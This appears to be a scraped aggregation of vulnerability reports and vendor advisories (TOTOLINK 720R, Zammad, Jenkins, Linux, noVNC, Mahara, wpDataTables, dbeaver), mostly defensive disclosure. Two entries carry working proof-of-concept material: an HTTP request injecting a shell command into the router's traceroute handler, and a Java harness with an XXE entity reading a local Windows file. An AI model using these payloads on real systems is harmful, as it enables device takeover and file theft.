TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setTracerouteCfg function.

**Exploit Title:**Totolink 720 has a code execution vulnerability  
**Version:**V4.1.5cu.374  
**Date:**2022/08/16  
**Exploit Author:**xiaohu816  
**Vendor Homepage:**https://www.totolink.net/

**POC:**  
After the administrator logs in, enter the "system tools" - > "route tracking" page to execute the command  
Execute TLS > / TMP / 2.txt

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 58
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/advance/traceroute.html?time=1659892330160
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SESSION_ID=2:1591951611:2
    Connection: close
    
    {"command":"aaaa\tls>/tmp/2.txt","num":"4","topicurl":"setTracerouteCfg"} 
    

**Analysis Report:**  
In the processing function of setting the routing parameters of the router, the input IP address is simply checked and then written into V6 through sprintf, and then the system is called for execution  
  
You can bypass the check by \\ t to realize command injection

CVE-2022-38535: TOTOLINK-720R/totolink 720 RCode Execution2.md at 177ee39a5a8557a6bd19586731b0e624548b67ee · Jfox816/TOTOLINK-720R

Zammad 5.2.0 suffers from Incorrect Access Control. Zammad did not correctly perform authorization on certain attachment endpoints. This could be abused by an unauthenticated attacker to gain access to attachments, such as emails or attached files.

Security Advisory

5\. Juli 2022 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2022-08
*   Date: 07/05/2022
*   Title: Unauthorized Access
*   Severity: high
*   Product: Zammad 5.2.x
*   Fixed in: Zammad 5.2.1
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Unauthorized Access**

Zammad did not correctly perform authorization on certain attachment endpoints. This could be abused by an unauthenticated attacker to gain access to attachments, such as emails or attached files.

Special 🙏 and 🤘 and ❤️ to:

*   N: Erik Kipka, Wilfried Kirsch
*   C: softScheck GmbH
*   W: www.softScheck.com

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/

Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2022-08

Send all remarks on security issues to security@zammad.com.

CVE-2022-35487: Security Advisory ZAA-2022-08 | Zammad

Insufficient privilege verification in Zammad v5.3.0 allows an authenticated attacker to perform changes on the tags of their customer tickets using the Zammad API. This is now corrected in v5.3.1 so that only agents with write permissions may change ticket tags.

Security Advisory

21\. September 2022 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2022-12
*   Date: 2022-12-21
*   Title: Incorrect Access Control
*   Severity: low
*   Product: Zammad 5.3.x
*   Fixed in: Zammad 5.3.1
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Incorrect Access Control**

Due to insufficient privilege verification, an authenticated attacker could perform changes on the tags of their customer tickets using the Zammad API. This is now corrected so that only agents with write permission may change ticket tags.

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/

Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2022-12

Please send remarks on security issues exclusively to security@zammad.com.

CVE-2022-48023: Security Advisory ZAA-2022-12 | Zammad

Jenkins 2.318 and earlier, LTS 2.303.2 and earlier does not check agent-to-controller access to create parent directories in FilePath#mkdirs.

CVE-2021-21685: Jenkins Security Advisory 2021-11-04

Linux kernel version 4.10 suffers from a use-after-free vulnerability in __do_semtimedop() due to a lockless check outside the RCU section.

Linux 4.10 Use-After-Free

Time-of-check time-of-use (toctou) race condition in Windows Fundamentals allows an authorized attacker to execute code over a network.

CVE-2025-29969: MS-EVEN RPC Remote Code Execution Vulnerability

An XSS vulnerability was discovered in noVNC before 0.6.2 in which the remote VNC server could inject arbitrary HTML into the noVNC web page via the messages propagated to the status field, such as the VNC server name.

1.  Releases
2.  v0.6.2

**\_This is a vulnerability fix release.**\_

Fixes a XSS issue in which the remote VNC server could inject arbitrary HTML into the noVNC web page via the messages propagated to the status field, such as the VNC server name.

This affects users of `vnc_auto.html` and `vnc.html`, as well as any users of `include/ui.js`.

Thanks to David Wyde of Cisco for reporting the issue.

CVE-2017-18635: Release v0.6.2 · novnc/noVNC

In Mahara 21.04 before 21.04.6, 21.10 before 21.10.4, and 22.04.2, files can sometimes be downloaded through thumb.php with no permission check.

**Mahara: Invalid Parameter**

A required parameter is missing or malformed

The 'id' parameter is not an integer

CVE-2022-33913: Mahara ePortfolio System

The wpDataTables – Tables & Table Charts premium WordPress plugin before 3.4.2 has Improper Access Control. A low privilege authenticated user that visits the page where the table is published can tamper the parameters to delete the data of another user that are present in the same table through id_key and id_val parameters. By exploiting this issue an attacker is able to delete the data of all users in the same table.

CVE-2021-24198: WordPress Plugin wpDataTables - Multiple Vulnerabilities

dbeaver is vulnerable to Improper Restriction of XML External Entity Reference

**✍️ Description**

The `dbeaver` is vulnerable to XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the `parseDocument()` function in the "XMLUtils.java" file may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.

**🕵️‍♂️ Proof of Concept**

    package xxe_poc;
    import java.io.File;
    import org.jkiss.utils.xml.XMLException;
    import org.jkiss.utils.xml.XMLUtils;
    import org.w3c.dom.Document;
    import org.w3c.dom.Element;
    import org.w3c.dom.Node;
    import org.w3c.dom.NodeList;
    
    public class Poc {
    
        public static void main(String[] args) {
            File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample.xml");
            Document doc;
            try {
                doc = XMLUtils.parseDocument(file);
                doc.getDocumentElement().normalize();
                NodeList nodeList = doc.getElementsByTagName("userInfo");
                for (int itr = 0; itr < nodeList.getLength(); itr++) {
                    Node node = nodeList.item(itr);
                    System.out.println("\nNode Name :" + node.getNodeName());
                    if (node.getNodeType() == Node.ELEMENT_NODE) {
                        Element eElement = (Element) node;
                        System.out.println(
                                "Last Name: " + eElement.getElementsByTagName("lastName").item(0).getTextContent());
                    }
                }
            } catch (XMLException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            }
    
        }
    }
    

sample.xml

    
    <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]>
    <userInfo>
     <firstName>John</firstName>
     <lastName>&ent;</lastName>
    </userInfo>
    

Check the Output:

    Node Name :userInfo
    Last Name: ; for 16-bit app support
    [fonts]
    [extensions]
    [mci extensions]
    [files]
    [Mail]
    MAPI=1

Search

lenovo warranty check/lookup | check warranty status | lenovo support us